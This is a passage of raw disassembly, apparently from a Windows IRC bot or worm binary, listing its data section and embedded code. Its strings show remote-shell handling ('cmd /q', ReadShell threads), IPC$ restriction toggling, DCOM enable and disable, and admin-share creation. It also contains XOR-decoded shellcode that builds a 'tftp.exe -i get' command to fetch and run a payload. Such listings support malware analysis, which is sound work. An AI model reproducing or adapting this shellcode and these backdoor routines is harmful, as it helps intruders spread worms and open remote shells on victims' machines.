db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aShareSDeleted_ db ' Share ',27h,'%S',27h,' deleted.',0
align 4
unk_42EB88 db 2 ; DATA XREF: sub_4143F6:loc_4145C5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToDele_0 db ' Failed to delete ',27h,'%s',27h,' share.',0
align 4
unk_42EBC4 db 2 ; DATA XREF: sub_4143F6+1C8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aShareSDelete_0 db ' Share ',27h,'%s',27h,' deleted.',0
align 4
unk_42EBF8 db 2 ; DATA XREF: sub_4143F6:loc_414528�o
; sub_41471A:loc_414848�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aAdvapi32_dllCo db ' Advapi32.dll couldn',27h,'t be loaded.',0
align 4
unk_42EC38 db 2 ; DATA XREF: sub_4143F6:loc_414521�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToOpenIp db ' Failed to open IPC$ Restriction registry key.',0
align 4
unk_42EC84 db 2 ; DATA XREF: sub_4143F6:loc_414503�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aRestrictedAcce db ' Restricted access to the IPC$ Share.',0
align 4
unk_42ECC8 db 2 ; DATA XREF: sub_4143F6+106�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToRestri db ' Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_4143F6+ED�o
; sub_41471A+ED�o
align 4
unk_42ED28 db 2 ; DATA XREF: sub_4143F6+91�o
; sub_41471A+91�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToOpenDc db ' Failed to open DCOM registry key.',0
align 4
dword_42ED68 dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_4143F6:loc_414463�o
dd 2202967h, 2002BBBBh, 4F434420h, 6964204Dh, 6C626173h
dd 2E6465h
unk_42ED94 db 2 ; DATA XREF: sub_4143F6+66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aDisableDcomFai db ' Disable DCOM failed.',0
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_4143F6+54�o
; sub_41471A+54�o
align 4
word_42EDD4 dw 4Eh ; DATA XREF: sub_4143F6+38�r
align 4
unk_42EDD8 db 2 ; DATA XREF: sub_41471A+2C3�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aNetworkSharesA db ' Network shares added.',0
align 4
aC_1 db '%c:\',0 ; DATA XREF: sub_41471A+230�o
align 4
aC_2 db '%c$',0 ; DATA XREF: sub_41471A+219�o
unk_42EE18 db 2 ; DATA XREF: sub_41471A:loc_4148B9�o
; sub_41471A:loc_41498A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToAddSSh db ' Failed to add ',27h,'%s',27h,' share.',0
align 10h
unk_42EE50 db 2 ; DATA XREF: sub_41471A+198�o
; sub_41471A+269�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aShareSAdded_ db ' Share ',27h,'%s',27h,' added.',0
align 10h
unk_42EE80 db 2 ; DATA XREF: sub_41471A:loc_414841�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToOpen_0 db ' Failed to open IPC$ restriction registry key.',0
align 4
unk_42EECC db 2 ; DATA XREF: sub_41471A:loc_414823�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aUnrestrictedAc db ' Unrestricted access to the IPC$ Share.',0
unk_42EF10 db 2 ; DATA XREF: sub_41471A+102�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToUnrest db ' Failed to unrestrict access to the IPC$ Share.',0
dword_42EF5C dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_41471A:loc_414787�o
dd 2202967h, 2002BBBBh, 4F434420h, 6E65204Dh, 656C6261h
dd 2E64h
unk_42EF88 db 2 ; DATA XREF: sub_41471A+66�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aEnableDcomFail db ' Enable DCOM failed.',0
align 4
word_42EFBC dw 59h ; DATA XREF: sub_41471A+38�r
align 10h
dword_42EFC0 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_414A34+DE�o
dd 2029671Fh, 2BBBB02h
aWaitformulti_0 db ' WaitForMultipleObjects error: <%d>.',0
align 4
dword_42F004 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_414A34+59�o
; sub_414A34+8B�o
dd 2029671Fh, 2BBBB02h
aFailedToCrea_0 db ' Failed to create ReadShell session thread, error: <%d>.',0
align 4
dword_42F05C dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_414B85+AF�o
dd 2029671Fh, 2BBBB02h
aFailedToExecut db ' Failed to execute shell.',0
align 4
dword_42F094 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_414B85+7E�o
dd 2029671Fh, 2BBBB02h
aFailedToCrea_1 db ' Failed to create shell stdin pipe, error: <%d>.',0
align 4
dword_42F0E4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_414B85+5C�o
dd 2029671Fh, 2BBBB02h
aFailedToCrea_2 db ' Failed to create shell stdout pipe, error: <%d>.',0
align 4
dword_42F134 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_414C7E+C3�o
dd 2029671Fh, 2BBBB02h
aFailedToExec_0 db ' Failed to execute shell, error: <%d>.',0
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_414C7E+8C�o
align 10h
dword_42F180 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_414D57+A1�o
dd 2029671Fh, 2BBBB02h
aSessionreadshe db ' SessionReadShellThread exited, error: <%ld>.',0
align 4
jmp short loc_42F1D0
; ---------------------------------------------------------------------------
loc_42F1CE: ; CODE XREF: _2:loc_42F1D0�p
jmp short loc_42F1D5
; ---------------------------------------------------------------------------
loc_42F1D0: ; CODE XREF: _2:0042F1CC�j
call loc_42F1CE
loc_42F1D5: ; CODE XREF: _2:loc_42F1CE�j
pop ebx
xor ecx, ecx
mov cx, 0FFFFh
loc_42F1DC: ; CODE XREF: _2:0042F1E1�j
xor byte ptr [ebx+0Eh], 0FFh
inc ebx
loop loc_42F1DC
add bl, ch
add ch, bl
add eax, 0FFFFF9E8h
call fword ptr [ebx+31h]
leave
mov cl, 0FFh
loc_42F1F2: ; CODE XREF: _2:0042F1F7�j
xor byte ptr [ebx+0Ch], 0FFh
inc ebx
loop loc_42F1F2
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dd 12h
aTftp_exeIGet db 'tftp.exe -i get ',0
; ---------------------------------------------------------------------------
push 0
call sub_42F294
jnz short loc_42F280
retn
; ---------------------------------------------------------------------------
loc_42F280: ; CODE XREF: _2:0042F27D�j _2:0042F28D�j
call near ptr loc_42F285+1
loc_42F285: ; CODE XREF: _2:loc_42F280�p
add [edx+0], ch
call sub_42F294
jz loc_42F280
retn
; =============== S U B R O U T I N E =======================================
sub_42F294 proc near ; CODE XREF: _2:0042F278�p _2:0042F288�p
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
sub_42F294 endp
; ---------------------------------------------------------------------------
align 10h
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_414FE9+10�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_4151BA+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_4151BA+35�o
dword_42F310 dd 0D51C685Bh ; DATA XREF: sub_4154D2+4�w sub_4154DC�r ...
align 10h
dword_42F320 dd 173Fh ; DATA XREF: sub_415E4A+D�r
dd 9875h, 9873h
off_42F32C dd offset sub_415F19 ; DATA XREF: sub_417BD8�r
dd offset nullsub_3
dd offset nullsub_3
dword_42F338 dd 1B3Fh ; DATA XREF: sub_415F93+D�r
dword_42F33C dd 19930520h, 4 dup(0) ; DATA XREF: sub_416415+2�o
; sub_41641E+2�o
off_42F350 dd offset sub_417C16 ; DATA XREF: sub_417DFA+1C�r
dword_42F354 dd 2 ; DATA XREF: sub_41D96C+E�r
; sub_41D9A5+46�r ...
off_42F358 dd offset aNull_0 ; DATA XREF: sub_417F58:loc_4182BC�r
; sub_417F58+457�r
; "(null)"
off_42F35C dd offset aNull ; DATA XREF: sub_417F58+259�r
; "(null)"
off_42F360 dd offset word_42F36A ; DATA XREF: sub_415964+23�r
; sub_415964:loc_4159C5�r ...
off_42F364 dd offset word_42F36A ; DATA XREF: sub_420FCB+18�r
db 2 dup(0)
word_42F36A dw 20h ; DATA XREF: sub_41F14D+18�r
; _2:off_42F360�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_42F56C dd 1 ; DATA XREF: sub_415964:loc_41596C�r
; sub_415964:loc_4159B0�r ...
byte_42F570 db 2Eh ; DATA XREF: sub_41A98F:loc_41A9CF�r
; sub_41A9E9+4�r ...
align 4
dd 1, 10h, 0
off_42F580 dd offset off_42F580 ; DATA XREF: sub_4199A8+D�o
; sub_4199A8+69�o ...
off_42F584 dd offset off_42F580 ; DATA XREF: sub_4199A8:loc_419A28�r
; sub_4199A8+89�w ...
dd offset dword_42F598
dd offset dword_42F598
dword_42F590 dd 0FFFFFFFFh ; DATA XREF: sub_4199A8�r
; sub_419AEC:loc_419B39�w
dd 0FFFFFFFFh
dword_42F598 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: _2:0042F588�o
; _2:0042F58C�o
off_4315A0 dd offset off_42F580 ; DATA XREF: sub_419AEC+15�r
; sub_419AEC+20�w ...
dword_4315A4 dd 1E0h ; DATA XREF: sub_415D6D:loc_415DA9�r
; sub_41756F+185�r ...
dword_4315A8 dd 14h ; DATA XREF: sub_41A6D8+2�o
off_4315AC dd offset aExp ; DATA XREF: sub_41A6D8:loc_41A6F5�r
; "exp"
dd 1Dh, 4227F4h, 1Ah, 4227F0h, 1Bh, 4227E8h, 1Fh, 4227E0h
dd 13h, 4227D8h, 21h, 4227D0h, 0Eh, 4227C8h, 0Dh, 4227C0h
dd 0Fh, 4227B8h, 10h, 4227B0h, 5, 4227A8h, 1Eh, 4227A4h
dd 12h, 4227A0h, 20h, 42279Ch, 0Ch, 422794h, 0Bh, 42278Ch
dd 15h, 422784h, 1Ch, 42277Ch, 19h, 422774h, 11h, 42276Ch
dd 18h, 422764h, 16h, 42275Ch, 17h, 422754h, 22h, 422750h
dd 23h, 42274Ch, 24h, 422748h
dbl_431680 dq 1.797693134862316e308 ; DATA XREF: sub_41A413+B7�r
; sub_41A413:loc_41A4FA�r ...
dd 0
dd 0FFF80000h
dbl_431690 dq 1.797693134862316e308 ; DATA XREF: sub_41A413+92�r
; sub_41A413:loc_41A4D2�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_4316A8 dt 2.3562723457267347066e313 ; DATA XREF: sub_41A8C0+D�r
; sub_41A8C0+1F�r
align 4
tbyte_4316B4 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_41A8C0+31�r
align 10h
off_4316C0 dd offset sub_41AD54 ; DATA XREF: sub_415F31+F�w
; sub_417F58+3AA�r
off_4316C4 dd offset sub_41A9E9 ; DATA XREF: sub_415F31+5�w
; sub_417F58+3E2�r
off_4316C8 dd offset sub_41AA4F ; DATA XREF: sub_415F31+14�w
; sub_41B7F5+430�r
off_4316CC dd offset sub_41A98F ; DATA XREF: sub_415F31+1E�w
; sub_417F58+3CB�r
off_4316D0 dd offset sub_41AA37 ; DATA XREF: sub_415F31+28�w
off_4316D4 dd offset sub_41AD54 ; DATA XREF: sub_415F31+32�w
dd offset sub_41E98E
align 10h
dd offset sub_41B61C
off_4316E4 dd offset sub_41B61C ; DATA XREF: sub_41B672+29�r
dword_4316E8 dd 0D2D0920h, 5Dh ; DATA XREF: sub_41B7F5:loc_41BD5C�o
dword_4316F0 dd 5Dh, 0 ; DATA XREF: sub_41B7F5:loc_41BC4C�o
byte_4316F8 db 1 ; DATA XREF: sub_41CA4D+E1�r
db 2, 4, 8
align 10h
dword_431700 dd 3A4h ; DATA XREF: sub_41CA4D+2F�o
dword_431704 dd 82798260h, 21h, 0 ; DATA XREF: sub_41CA4D+11D�r
dword_431710 dd 0DFA6h ; DATA XREF: sub_41CA4D+C0�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_4317F0 dd 1 ; DATA XREF: sub_41CA4D+3C�o
; sub_41D064+C�o
dword_4317F4 dd 16h ; DATA XREF: sub_41D064:loc_41D099�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_431958 dd 0C0000005h ; DATA XREF: sub_41D064+19�o
; sub_41D20C+A�r ...
dword_43195C dd 0Bh ; DATA XREF: sub_41FE88+A�r
dd 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_4319D0 dd 3 ; DATA XREF: sub_41D0CB+58�r
; sub_41FD5B+C8�r
dword_4319D4 dd 7 ; DATA XREF: sub_41D0CB+5E�r
; sub_41FD5B+CD�r
dword_4319D8 dd 0Ah ; DATA XREF: sub_41D20C+4�r
; sub_41FE88+4�r
dword_4319DC dd 8Ch ; DATA XREF: sub_41D0CB+82�r
; sub_41D0CB+8F�w ...
dword_4319E0 dd 0FFFFFFFFh, 0A00h ; DATA XREF: sub_417E43:loc_417F00�o
; sub_41C368:loc_41C3E9�o
dword_4319E8 dd 2 ; DATA XREF: sub_41D9A5+E�o
; sub_41D9A5+28�r
off_4319EC dd offset aR6002FloatingP ; DATA XREF: sub_41D9A5+FC�r
; sub_41D9A5+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 422B14h, 9, 422AE8h, 0Ah, 422AC4h, 10h, 422A98h
dd 11h, 422A68h, 12h, 422A44h, 13h, 422A18h, 18h, 4229E0h
dd 19h, 4229B8h, 1Ah, 422980h, 1Bh, 422948h, 1Ch, 422920h
dd 78h, 422910h, 79h, 422900h, 7Ah, 4228F0h, 0FCh, 425D20h
dd 0FFh, 4228E0h
off_431A78 dd offset dword_4C93A0 ; DATA XREF: sub_41D9A5+1B�o
; _0:0041DBB7�o
align 10h
dd offset dword_4C93A0
dd 101h
dword_431A88 dd 0FFFFFFFFh, 0 ; DATA XREF: _0:0041DBD4�o
dd 1000h, 0
dword_431A98 dd 3 dup(0) ; DATA XREF: sub_417E43+50�o
; sub_4189C2+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_431AB8 dd 3 dup(0) ; DATA XREF: sub_417E43+58�o
; sub_4189C2:loc_4189E0�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_431AE8 dd 84h dup(0) ; DATA XREF: _0:0041DBFD�o
dword_431CF8 dd 2694h ; DATA XREF: sub_41A075+3�r
; sub_41A0C8+46�r ...
align 10h
dword_431D00 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_41E76E�o
dword_431D18 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_41E784�o
dword_431D30 dd 7080h ; DATA XREF: sub_41C2A6+76�r
; sub_41EBF2+5E�w ...
dword_431D34 dd 1 ; DATA XREF: sub_41C2A6+98�r
; sub_41EBF2+8B�w ...
dword_431D38 dd 0FFFFF1F0h ; DATA XREF: sub_41C2A6:loc_41C358�r
; sub_41EBF2+94�w ...
dword_431D3C dd 545350h, 0Fh dup(0) ; DATA XREF: _2:off_431DBC�o
dword_431D7C dd 544450h, 0Fh dup(0) ; DATA XREF: _2:off_431DC0�o
off_431DBC dd offset dword_431D3C ; DATA XREF: sub_41EBF2+BA�r
; sub_41EBF2+D9�r ...
off_431DC0 dd offset dword_431D7C ; DATA XREF: sub_41EBF2+F4�r
; sub_41EBF2+11B�r ...
align 8
dword_431DC8 dd 0FFFFFFFFh ; DATA XREF: sub_41EBF2+1D�w
; sub_41EE50+1E�r ...
dword_431DCC dd 0 ; DATA XREF: sub_41EE50:loc_41EF84�r
; sub_41EFFC+BF�w
dword_431DD0 dd 0 ; DATA XREF: sub_41EE50+192�r
; sub_41EFFC+E0�w
align 8
dword_431DD8 dd 0FFFFFFFFh ; DATA XREF: sub_41EBF2+17�w
; sub_41EE50+26�r ...
dword_431DDC dd 0 ; DATA XREF: sub_41EE50+13A�r
; sub_41EFFC+EA�w ...
dword_431DE0 dd 0 ; DATA XREF: sub_41EE50+1A1�r
; sub_41EFFC+23�r ...
dword_431DE4 dd 0FFFFFFFFh ; DATA XREF: sub_41EFFC+84�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_431E14 dd 16Dh ; DATA XREF: sub_41C2A6+2A�r
; sub_41EFFC+2E�r ...
dword_431E18 dd 0FFFFFFFFh ; DATA XREF: sub_41EFFC:loc_41F088�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_431E50 dd 2 dup(0) ; DATA XREF: sub_4201E0+7�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_431FB0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_4201E0+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_43210C dd offset off_422CE8 ; DATA XREF: _1:00422EC4�o _1:00422FB0�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_432124 dd offset off_422CE8 ; DATA XREF: _1:off_422D78�o
; _1:00422DB8�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_432144 dd offset off_422CE8 ; DATA XREF: _1:off_422DC0�o
; _1:00422E04�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_432164 dd offset off_422CE8 ; DATA XREF: _1:off_422E0C�o
; _1:00422E50�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 8
off_432188 dd offset off_422CE8 ; DATA XREF: _1:off_422E58�o
; _1:00422E94�o
align 10h
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset sub_41E98E
align 8
byte_4321A8 db 0 ; DATA XREF: sub_40144A+1D3�w
; sub_40144A+2D2�o
align 2
word_4321AA dw 0 ; DATA XREF: sub_40144A+1E3�w
word_4321AC dw 0 ; DATA XREF: sub_40144A+1E9�w
word_4321AE dw 0 ; DATA XREF: sub_40144A+1F0�w
byte_4321B0 db 0 ; DATA XREF: sub_40144A+1F7�w
byte_4321B1 db 0 ; DATA XREF: sub_40144A+1FE�w
word_4321B2 dw 0 ; DATA XREF: sub_40144A+204�w
dword_4321B4 dd 0 ; DATA XREF: sub_40144A+234�w
; sub_40144A+250�w
dword_4321B8 dd 0 ; DATA XREF: sub_40144A+258�w
byte_4321BC db 0 ; DATA XREF: sub_40144A+26A�w
byte_4321BD db 0 ; DATA XREF: sub_40144A+27D�w
word_4321BE dw 0 ; DATA XREF: sub_40144A+295�w
word_4321C0 dw 0 ; DATA XREF: sub_40144A+2A4�w
word_4321C2 dw 0 ; DATA XREF: sub_40144A+29C�w
dword_4321C4 dd 102h dup(0) ; DATA XREF: sub_40144A+2B9�o
dword_4325CC dd 2 dup(0) ; DATA XREF: sub_403087+68�o
dword_4325D4 dd 0 ; DATA XREF: sub_402B27+13�o
; sub_40D2E0+610D�o ...
byte_4325D8 db 0 ; DATA XREF: sub_4033A1+10�o
; sub_40513E+74�o ...
align 4
dword_4325DC dd 0 ; DATA XREF: sub_404021+2A�w
; sub_404021+51�r ...
dword_4325E0 dd 0 ; DATA XREF: sub_40345C+45�r
; sub_403A1B+6B�w ...
align 8
dword_4325E8 dd 0 ; DATA XREF: sub_405821+18�r
; sub_405C74+92�w ...
dword_4325EC dd 0 ; DATA XREF: sub_405DAD+4D�r
; sub_405FC5+D9�w ...
dd 7FEh dup(0)
